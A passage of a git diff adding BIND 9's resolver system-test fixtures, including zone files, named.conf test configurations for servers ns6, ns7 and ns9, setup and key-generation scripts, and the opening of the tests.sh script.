10.53.0.6 +ns9 IN A 10.53.0.6 +$TTL 1 +@ IN A 10.53.0.6 +www.sub IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/delegation-only.db b/bin/tests/system/resolver/ns6/delegation-only.db new file mode 100644 index 0000000..b144338 --- /dev/null +++ b/bin/tests/system/resolver/ns6/delegation-only.db @@ -0,0 +1,33 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ IN SOA ns marka.isc.org. 1 0 0 0 120 +@ IN NS ns +@ IN DNSKEY 256 3 7 AwEAAY9437GPWJHzBeR4FP6eJAie7gh2QSM6LUnbDAHvHOx8MNqgSVRM PZka2rAgivb65/MkT1lXRUegj91iRFP3iggTpCgvdUbcBjsYrdODsrwF YUMIUl1pU0lH9x7KvfFUOfSmG+Rk5UHUWuRZbNyc65Sq69iFXg5c11+8 MAkRoeDF +; +; Delegation only test CDS and CDNSKEY records. These should be +; returned even if delegation-only is set for this zone. +; +@ IN A 1.2.3.4 +@ IN AAAA c::1.2.3.4 +@ IN CDS 12023 7 2 36FB69A752615831B47EA6EF9EA4619D0FB08ABDA69EA3ED200F4C02FF4921D4 +@ IN CDNSKEY 256 3 7 AwEAAY9437GPWJHzBeR4FP6eJAie7gh2QSM6LUnbDAHvHOx8MNqgSVRM PZka2rAgivb65/MkT1lXRUegj91iRFP3iggTpCgvdUbcBjsYrdODsrwF YUMIUl1pU0lH9x7KvfFUOfSmG+Rk5UHUWuRZbNyc65Sq69iFXg5c11+8 MAkRoeDF +; +; Delegation only test CDS and CDNSKEY records. These should be rejected +; as they are not at the zone apex. +; +a IN A 1.2.3.4 +aaaa IN AAAA c::1.2.3.4 +cds IN CDS 21366 7 1 E6C1716CFB6BDC84E84CE1AB5510DAC69173B5B2 +cdnskey IN CDNSKEY 256 3 7 AwEAAY9437GPWJHzBeR4FP6eJAie7gh2QSM6LUnbDAHvHOx8MNqgSVRM PZka2rAgivb65/MkT1lXRUegj91iRFP3iggTpCgvdUbcBjsYrdODsrwF YUMIUl1pU0lH9x7KvfFUOfSmG+Rk5UHUWuRZbNyc65Sq69iFXg5c11+8 MAkRoeDF +; +ns IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/ds.example.net.db.in b/bin/tests/system/resolver/ns6/ds.example.net.db.in new file mode 100644 index 0000000..fad382b --- /dev/null +++ b/bin/tests/system/resolver/ns6/ds.example.net.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/example.net.db.in b/bin/tests/system/resolver/ns6/example.net.db.in new file mode 100644 index 0000000..740804a --- /dev/null +++ b/bin/tests/system/resolver/ns6/example.net.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +@ IN MX 0 mail +ns IN A 10.53.0.6 +mail IN A 10.53.0.6 +fetch 10 IN TXT A short ttl +non-zero 10 IN TXT A short ttl +zero 0 IN TXT A zero ttl +$TTL 13 +ds IN NS ns.ds +ns.ds IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/fetch.tld.db b/bin/tests/system/resolver/ns6/fetch.tld.db new file mode 100644 index 0000000..1d59e5a --- /dev/null +++ b/bin/tests/system/resolver/ns6/fetch.tld.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.fetch.tld. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.fetch.tld. +ns.fetch.tld. A 10.53.0.6 + +@ 13 TXT A short ttl diff --git a/bin/tests/system/resolver/ns6/keygen.sh b/bin/tests/system/resolver/ns6/keygen.sh new file mode 100644 index 0000000..e992154 --- /dev/null +++ b/bin/tests/system/resolver/ns6/keygen.sh @@ -0,0 +1,39 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# +# We use rsasha256 here to get a ZSK + KSK that don't fit in 512 bytes. +# +zone=ds.example.net +zonefile="${zone}.db" +infile="${zonefile}.in" +cp $infile $zonefile +ksk=$($KEYGEN -q -a rsasha256 -fk $zone) +zsk=$($KEYGEN -q -a rsasha256 -b 2048 $zone) +cat $ksk.key $zsk.key >> $zonefile +$SIGNER -P -o $zone $zonefile > /dev/null + +zone=example.net +zonefile="${zone}.db" +infile="${zonefile}.in" +cp $infile $zonefile +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $zone) +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $zone) +cat $ksk.key $zsk.key dsset-ds.example.net$TP >> $zonefile +$SIGNER -P -o $zone $zonefile > /dev/null + +# Configure a static key to be used by delv +keyfile_to_static_ds $ksk > ../ns5/trusted.conf diff --git a/bin/tests/system/resolver/ns6/moves.db b/bin/tests/system/resolver/ns6/moves.db new file mode 100644 index 0000000..06634ee --- /dev/null +++ b/bin/tests/system/resolver/ns6/moves.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.server. +foo TXT "From NS 6" +bar TXT "From NS 6" diff --git a/bin/tests/system/resolver/ns6/named.conf.in b/bin/tests/system/resolver/ns6/named.conf.in new file mode 100644 index 0000000..9ed68be --- /dev/null +++ b/bin/tests/system/resolver/ns6/named.conf.in @@ -0,0 +1,101 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +options { + query-source address 10.53.0.6 dscp 10; + notify-source 10.53.0.6 dscp 11; + transfer-source 10.53.0.6 dscp 12; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { fd92:7065:b8e:ffff::6; }; + recursion no; + dnssec-validation no; + querylog yes; + statistics-file "named.stats"; + /* + * test that named loads with root-delegation-only that + * has a exclude list. + */ + root-delegation-only exclude { "a"; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example.net" { + type primary; + file "example.net.db.signed"; + allow-update { any; }; +}; + +zone "ds.example.net" { + type primary; + file "ds.example.net.db.signed"; + allow-update { any; }; +}; + +zone "to-be-removed.tld" { + type primary; + file "to-be-removed.tld.db"; + allow-update { any; }; +}; + +zone "broken" { + type primary; + file "broken.db"; + allow-update { any; }; +}; + +zone "redirect.com" { + type primary; + file "redirect.com.db"; +}; + +zone "tld1" { + type primary; + file "tld1.db"; +}; + +zone "no-edns-version.tld" { + type primary; + file "no-edns-version.tld.db"; +}; + +zone "delegation-only" { + type primary; + file "delegation-only.db"; +}; + +zone "fetch.tld" { + type primary; + file "fetch.tld.db"; +}; + +zone "targetns" { + type primary; + file "targetns.db"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/resolver/ns6/no-edns-version.tld.db b/bin/tests/system/resolver/ns6/no-edns-version.tld.db new file mode 100644 index 0000000..9ab654d --- /dev/null +++ b/bin/tests/system/resolver/ns6/no-edns-version.tld.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA . . 0 0 0 0 0 +@ NS ns +ns A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/redirect.com.db b/bin/tests/system/resolver/ns6/redirect.com.db new file mode 100644 index 0000000..f79f6dd --- /dev/null +++ b/bin/tests/system/resolver/ns6/redirect.com.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 + +; 10.53.1.* are non-responsive IP addresses +$GENERATE 1-100 ns$.fake IN A 10.53.1.$ +$GENERATE 101-200 ns$.fake IN A 10.53.1.${-100} +$GENERATE 201-300 ns$.fake IN A 10.53.1.${-200} +$GENERATE 301-400 ns$.fake IN A 10.53.1.${-300} +$GENERATE 401-500 ns$.fake IN A 10.53.1.${-400} +$GENERATE 501-600 ns$.fake IN A 10.53.1.${-500} +$GENERATE 601-700 ns$.fake IN A 10.53.1.${-600} +$GENERATE 701-800 ns$.fake IN A 10.53.1.${-700} +$GENERATE 801-900 ns$.fake IN A 10.53.1.${-800} +$GENERATE 901-1000 ns$.fake IN A 10.53.1.${-900} diff --git a/bin/tests/system/resolver/ns6/root.db b/bin/tests/system/resolver/ns6/root.db new file mode 100644 index 0000000..096381c --- /dev/null +++ b/bin/tests/system/resolver/ns6/root.db @@ -0,0 +1,36 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.6 +a.root-servers.nil. AAAA fd92:7065:b8e:ffff::6 +moves. NS ns.server. +server. NS ns7.server. +ns7.server. A 10.53.0.7 +; +; These two delegations are strictly not necessary as the test resolver (ns5) +; doesn't have this zone as its root. They are just done for consistency with +; the delegations in ns4/tld. +; +no-edns-version.tld. NS ns.no-edns-version.tld. +ns.no-edns-version.tld. A 10.53.0.6 +edns-version.tld. NS ns.edns-version.tld. +ns.edns-version.tld. A 10.53.0.7 +v4only.net. NS v4.nameserver. +v4.nameserver. A 10.53.0.4 diff --git a/bin/tests/system/resolver/ns6/targetns.db b/bin/tests/system/resolver/ns6/targetns.db new file mode 100644 index 0000000..4d9496b --- /dev/null +++ b/bin/tests/system/resolver/ns6/targetns.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; In the test for checking how many NS records BIND will follow, this +; zone marks the server as the one to which the NS lookups will be +; directed. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) + NS ns +ns A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns6/tld1.db b/bin/tests/system/resolver/ns6/tld1.db new file mode 100644 index 0000000..412509b --- /dev/null +++ b/bin/tests/system/resolver/ns6/tld1.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 + +$GENERATE 1-21 sub IN NS sub-ns$.tld2. diff --git a/bin/tests/system/resolver/ns6/to-be-removed.tld.db.in b/bin/tests/system/resolver/ns6/to-be-removed.tld.db.in new file mode 100644 index 0000000..5638090 --- /dev/null +++ b/bin/tests/system/resolver/ns6/to-be-removed.tld.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 +ns0 IN A 10.53.0.6 +ns1 IN A 10.53.0.6 +ns2 IN A 10.53.0.6 +ns3 IN A 10.53.0.6 +ns4 IN A 10.53.0.6 +ns5 IN A 10.53.0.6 +ns6 IN A 10.53.0.6 +ns7 IN A 10.53.0.6 +ns8 IN A 10.53.0.6 +ns9 IN A 10.53.0.6 +$TTL 1 +@ IN A 10.53.0.6 +www IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns7/all-cnames.db b/bin/tests/system/resolver/ns7/all-cnames.db new file mode 100644 index 0000000..85003ee --- /dev/null +++ b/bin/tests/system/resolver/ns7/all-cnames.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS cname.tld. diff --git a/bin/tests/system/resolver/ns7/edns-version.tld.db b/bin/tests/system/resolver/ns7/edns-version.tld.db new file mode 100644 index 0000000..bcfae40 --- /dev/null +++ b/bin/tests/system/resolver/ns7/edns-version.tld.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA . . 0 0 0 0 0 +@ NS ns +ns A 10.53.0.7 diff --git a/bin/tests/system/resolver/ns7/named1.conf.in b/bin/tests/system/resolver/ns7/named1.conf.in new file mode 100644 index 0000000..2070ffa --- /dev/null +++ b/bin/tests/system/resolver/ns7/named1.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS7 + +options { + query-source address 10.53.0.7 dscp 13; + notify-source 10.53.0.7 dscp 14; + transfer-source 10.53.0.7 dscp 15; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { fd92:7065:b8e:ffff::7; }; + recursion yes; + dnssec-validation yes; + empty-zones-enable yes; + disable-empty-zone 20.172.in-addr.arpa; + /* + * check prefetch disabled + * check zero ttl not returned + */ + prefetch 0; + querylog yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "server" { + type primary; + file "server.db"; + allow-update { any; }; +}; + +zone "edns-version.tld" { + type primary; + file "edns-version.tld.db"; +}; + +zone "all-cnames" { + type primary; + file "all-cnames.db"; +}; + +zone "tld2" { + type primary; + file "tld2.db"; +}; + +zone "sub.tld1" { + type primary; + file "sub.tld1.db"; +}; diff --git a/bin/tests/system/resolver/ns7/named2.conf.in b/bin/tests/system/resolver/ns7/named2.conf.in new file mode 100644 index 0000000..2070ffa --- /dev/null +++ b/bin/tests/system/resolver/ns7/named2.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS7 + +options { + query-source address 10.53.0.7 dscp 13; + notify-source 10.53.0.7 dscp 14; + transfer-source 10.53.0.7 dscp 15; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { fd92:7065:b8e:ffff::7; }; + recursion yes; + dnssec-validation yes; + empty-zones-enable yes; + disable-empty-zone 20.172.in-addr.arpa; + /* + * check prefetch disabled + * check zero ttl not returned + */ + prefetch 0; + querylog yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "server" { + type primary; + file "server.db"; + allow-update { any; }; +}; + +zone "edns-version.tld" { + type primary; + file "edns-version.tld.db"; +}; + +zone "all-cnames" { + type primary; + file "all-cnames.db"; +}; + +zone "tld2" { + type primary; + file "tld2.db"; +}; + +zone "sub.tld1" { + type primary; + file "sub.tld1.db"; +}; diff --git a/bin/tests/system/resolver/ns7/root.hint b/bin/tests/system/resolver/ns7/root.hint new file mode 100644 index 0000000..3337bd5 --- /dev/null +++ b/bin/tests/system/resolver/ns7/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns7/server.db.in b/bin/tests/system/resolver/ns7/server.db.in new file mode 100644 index 0000000..7d5169a --- /dev/null +++ b/bin/tests/system/resolver/ns7/server.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns7 +ns7 A 10.53.0.7 +ns A 10.53.0.5 +child NS ns.child +ns.child A 10.53.0.5 diff --git a/bin/tests/system/resolver/ns7/sub.tld1.db b/bin/tests/system/resolver/ns7/sub.tld1.db new file mode 100644 index 0000000..b2d46c6 --- /dev/null +++ b/bin/tests/system/resolver/ns7/sub.tld1.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 + +$GENERATE 1-21 @ IN NS sub-ns$.tld2. + +$GENERATE 1-21 bar IN NS bar-sub-ns$.tld2. diff --git a/bin/tests/system/resolver/ns7/tld2.db b/bin/tests/system/resolver/ns7/tld2.db new file mode 100644 index 0000000..1f31b51 --- /dev/null +++ b/bin/tests/system/resolver/ns7/tld2.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.7 + +$GENERATE 1-21 sub-ns$ IN A 10.53.0.7 +$GENERATE 1-21 bar-sub-ns$ IN A 10.53.0.3 diff --git a/bin/tests/system/resolver/ns9/named.args b/bin/tests/system/resolver/ns9/named.args new file mode 100644 index 0000000..0c66bc0 --- /dev/null +++ b/bin/tests/system/resolver/ns9/named.args @@ -0,0 +1,2 @@ +# this server is IPv6 only +-6 -m record -c named.conf -d 99 -D resolver-ns9 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/resolver/ns9/named.conf.in b/bin/tests/system/resolver/ns9/named.conf.in new file mode 100644 index 0000000..3be31db --- /dev/null +++ b/bin/tests/system/resolver/ns9/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS9 + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { none; }; + listen-on-v6 { fd92:7065:b8e:ffff::9; }; + recursion yes; + dnssec-validation yes; + dual-stack-servers { fd92:7065:b8e:ffff::7; }; + qname-minimization off; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet fd92:7065:b8e:ffff::9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/resolver/ns9/named.ipv6-only b/bin/tests/system/resolver/ns9/named.ipv6-only new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/resolver/ns9/named.ipv6-only diff --git a/bin/tests/system/resolver/ns9/root.hint b/bin/tests/system/resolver/ns9/root.hint new file mode 100644 index 0000000..f74fbf1 --- /dev/null +++ b/bin/tests/system/resolver/ns9/root.hint @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.6 +a.root-servers.nil. IN AAAA fd92:7065:b8e:ffff::6; diff --git a/bin/tests/system/resolver/prereq.sh b/bin/tests/system/resolver/prereq.sh new file mode 100644 index 0000000..902f8db --- /dev/null +++ b/bin/tests/system/resolver/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION eq "0.76" || $Net::DNS::VERSION eq "0.77");' 2>/dev/null + then + : + else + echo_i "Net::DNS version 0.76 and 0.77 have a bug that causes this test to fail: please update." >&2 + exit 1 + fi +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/resolver/setup.sh b/bin/tests/system/resolver/setup.sh new file mode 100644 index 0000000..0f0832c --- /dev/null +++ b/bin/tests/system/resolver/setup.sh @@ -0,0 +1,28 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cp ns4/tld1.db ns4/tld.db +cp ns6/to-be-removed.tld.db.in ns6/to-be-removed.tld.db +cp ns7/server.db.in ns7/server.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named1.conf.in ns7/named.conf +copy_setports ns9/named.conf.in ns9/named.conf + +(cd ns6 && $SHELL keygen.sh) diff --git a/bin/tests/system/resolver/tests.sh b/bin/tests/system/resolver/tests.sh new file mode 100755 index 0000000..379b1d7 --- /dev/null +++ b/bin/tests/system/resolver/tests.sh @@ -0,0 +1,927 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +dig_with_opts() { + "${DIG}" -p "${PORT}" "${@}" +} + +resolve_with_opts() { + "${RESOLVE}" -p "${PORT}" "${@}" +} + +rndccmd() { + "${RNDC}" -c "${SYSTEMTESTTOP}/common/rndc.conf" -p "${CONTROLPORT}" -s "${@}" +} + +status=0 +n=0 + +n=$((n+1)) +echo_i "checking non-cachable NXDOMAIN response handling ($n)" +ret=0 +dig_with_opts +tcp nxdomain.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking non-cachable NXDOMAIN response handling using dns_client ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 nxdomain.example.net 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: ncache nxdomain" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +if [ -x "${RESOLVE}" ] ; then + 